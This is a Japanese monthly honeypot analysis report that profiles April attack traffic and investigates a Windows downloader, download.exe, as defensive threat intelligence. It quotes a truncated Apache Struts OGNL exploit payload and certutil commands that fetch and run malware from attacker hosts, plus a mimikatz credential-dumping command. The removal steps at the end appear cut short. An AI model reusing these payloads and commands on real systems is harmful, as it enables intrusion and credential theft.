【ハニーポット月次分析】HoneyTrap 4月度〜download.exeの正体〜
4月度のHoneytrapの月次レポートとなります。今回はマルウェアであるdownload.exeについて深掘りして調査してみました。
4月度 Honeytrap 月次レポート(80ポートを除く)
1.全体の傾向
a.検知数
b.国別アクセスマッピング
検知数が多くなっている箇所はRDPのスキャンによって増加しています。RDPのスキャン時に広範囲のポートに行われるため、検知数が増加する傾向となっています。
c.ポート別検知数
宛先ポート | 検知数 |
---|---|
445 | 63244 |
3389 | 4013 |
8080 | 3901 |
222 | 2770 |
2222 | 2675 |
20022 | 2641 |
22222 | 2591 |
2211 | 2435 |
2022 | 2102 |
81 | 1932 |
SMBがトップであることは変わらず、SSHの通信が多い割合となっています。
d. ターゲット別集計
製品/対象 | 検知数 |
Realtek SDK | 438 |
Apache Struts | 138 |
Huawei Router HG532 | 126 |
Radius? | 65 |
Backdoor | 50 |
Linksys E-series | 39 |
HooToo TM6 router | 14 |
AVTECH IP Camera/NVR/DVR | 11 |
Oracle WebLogic | 4 |
Android Debug Bridge(ADB) | 3 |
D-Link Devices | 3 |
LG SuperSign CMS | 3 |
Elasticsearch | 3 |
Linux向け仮想通貨発掘マルウェア | 2 |
ZTE ZXV10 H108L | 1 |
Netgear R7000/R6400 | 1 |
MiOS Z-Wave home gateway | 1 |
IoT製品およびApache Strutsの脆弱性を狙った攻撃が検知の大半を占めていました。また、Backdoor「FxCodeShell.jsp」の設置や確認する動きも増加傾向にあります。
IoT製品は Miraiおよび Gafgyt の亜種をダウンロードさせるものであり、Apache Struts はCVE-2017-5638(S2-045)の脆弱性を狙ったものであり、マルウェアのダウンロードを狙っていました。
今回はゼロデイであったWeblogicの脆弱性(CVE-2019-2725)を狙った通信も検知していますが、マルウェアをダウンロードさせようとしているものは2件のみでした。
他にこれまでと大きく異なる脆弱性やマルウェアの検知はありませんでした。
e. マルウェアダウンロード先(Top10)
マルウェアダウンロード先 |
分類 | 検知数 |
hxxp://fid[.]hognoob[.]se/download[.]exe | Apache Struts | 188 |
hxxp://176[.]56[.]237[.]213/[M] | IoT | 164 |
hxxp://w[.]3ei[.]xyz:43768/lll[.]sh | Radius? | 65 |
hxxp://185[.]161[.]70[.]150/mips | IoT | 61 |
hxxp://176[.]56[.]237[.]213/Demon[.]mips | IoT | 38 |
46[.]101[.]210[.]172 | Huawei Router HG532 | 34 |
hxxp://185[.]52[.]1[.]95/Demon[.]mips | IoT | 34 |
hxxp://185[.]172[.]110[.]226/mips | IoT | 30 |
hxxp://185[.]161[.]70[.]165/mips | IoT | 24 |
hxxp://185[.]172[.]110[.]227/Corona[.]mips | IoT | 23 |
今月最も検知が多かったマルウェアURLは 「hxxp://fid[.]hognoob[.]se/download[.]exe」でした。こちらについては別途分析しているのでそちらを参照してください。
他については大きく傾向が変わったところはありませんでした。
2.download.exe の調査
今回、検知数が多かった download[.]exe について調査してみました。
本マルウェアはVirusTotalに登録されていますが機能面までは不明であったため、動的解析と他のサイトの情報を調査していました。
https://www.virustotal.com/#/file/8c0d73a19780c83d8a6305abf8a6cbbf62e5b4abc28f56b6fea967583d1a16c7/detection
本マルウェアですが、以前のダウンロード先はhxxp://a46[.]bulehero[.]in/download[.]exe でしたが、ここ最近で変更されました。拡張子はexeファイルであることからwindowsサーバを対象に狙っていると思われます。
攻撃で利用されるペイロード例は以下となります。
GET /struts2-rest-showcase/orders.xhtml HTTP/1.1.
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):
〜省略〜
(#cmd='cmd.exe /c certutil.exe -urlcache -split -f hxxp://fid[.]hognoob[.]se/download.exe C:/Windows/temp/zsxvmpnktkgjzqr14303[.]exe & cmd.exe /c C:/Windows/temp/zsxvmpnktkgjzqr14303.exe')
〜省略〜
download.exe実行後はマルウェア本体と思われるwercplshost.exeをダウンロードするため、以下のコマンドを実行します。
cmd.exe /c certutil.exe -urlcache -split -f hxxp://fid[.]hognoob[.]se/wercplshost[.]exe %SystemRoot%\Temp\wercplshost.exe & %SystemRoot%\Temp\wercplshost[.]exe
このことからdownload.exeはダウンローダと推測できます。ダウンロードされるマルウェアはVirusTotal上で多くのベンダからマルウェア判定されています。
https://www.virustotal.com/#/file/9ac977087c08face38d8993db5cc26048f68d412243216887a61130d95150988/detection
ダウンロード後は以下のようなコマンドを実行し、情報収集や永続化を試みます。
※1例となります。
①
cmd /c C:\WINDOWS\dispmrroe\Coolmaster\SerachPortocoiHost.exe -p80 192.168.xxx.xxx/24 --rate=4096
SerachPortocoiHost.exe の詳細は特定できませんでしたが、コマンド内容からローカルIPで空いているポート80を探索するものと推測できます。他にも-p
②
cmd /c C:\WINDOWS\dispmrroe\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\WINDOWS\dispmrroe\Corporate\log.txt
本コマンドは mimikatz でOS内に保存された認証情報を搾取するコマンドとなります。vfshost.exe はmimikatz であり、実際に該当のパスに保存されているファイルを確認したところ、認証情報が記載されていました。
https://jpcertcc.github.io/ToolAnalysisResultSheet_jp/details/Mimikatz_sekurlsa-logonpasswords.htm
③
c:\windows\system32\cmd.EXE /c echo Y|cacls C:\WINDOWS\miagration\wercplshost.exe /p everyone:F
c:\windows\system32\cmd.EXE /c echo Y|cacls C:\WINDOWS\TEMP\locales\taskmgr.exe /p everyone:F
永続化を行うためにタスクスケジューラへ登録を行っています。また、wercplshost.exe も自動起動するようになっているため、これらのタスクスケジュールにより再起動後もマルウェアが実行される仕組みとなっています。マルウェアの自動起動を削除するためにはタスクスケジューラから該当のスケジュールにする HispDemon、wercpsypostおよびTablteInputoutを削除する必要があります。
ここからの情報は動的解析上ではうまく分析できませんでしたが、以下のサイトに分析情報が記載されていました。
https://translate.google.com/translate?hl=ja&sl=zh-CN&u=https://www.4hou.com/system/16690.html&prev=search
以降は空いているポートや製品に該当するExploitコードを用いて「FxCodeShell.jsp」を設置するとの報告もありました。download.exeで脆弱性を調査し、FxCodeShell.jspを設置するため、この二つのマルウェアは関連性が高いと思われます。
本マルウェアを駆除するためには、以下のファイル、ディレクトリ、タスクを削除する必要があります。
※これ以外にも存在する可能性や名前が変更されている可能性があります。
該当ファイルを削除:
タスク名:HispDemon
cmd /c C:\ Windows \ ime \ wercplshost.exe
以上、月次分析となります。